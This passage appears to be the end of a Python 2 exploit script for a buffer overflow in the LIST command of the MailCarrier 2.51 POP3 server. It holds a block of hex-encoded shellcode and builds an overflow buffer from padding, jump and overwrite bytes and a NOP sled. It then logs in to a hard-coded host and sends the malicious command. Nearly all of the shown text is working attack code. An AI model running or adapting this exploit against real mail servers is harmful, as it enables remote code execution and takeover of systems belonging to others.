"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
"\x6f\x78\x55\x41\x41")

buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (3798-(len(shellcode)))

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
print "[*] Sending Evil LIST buffer\r\n"
s.send('LIST ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"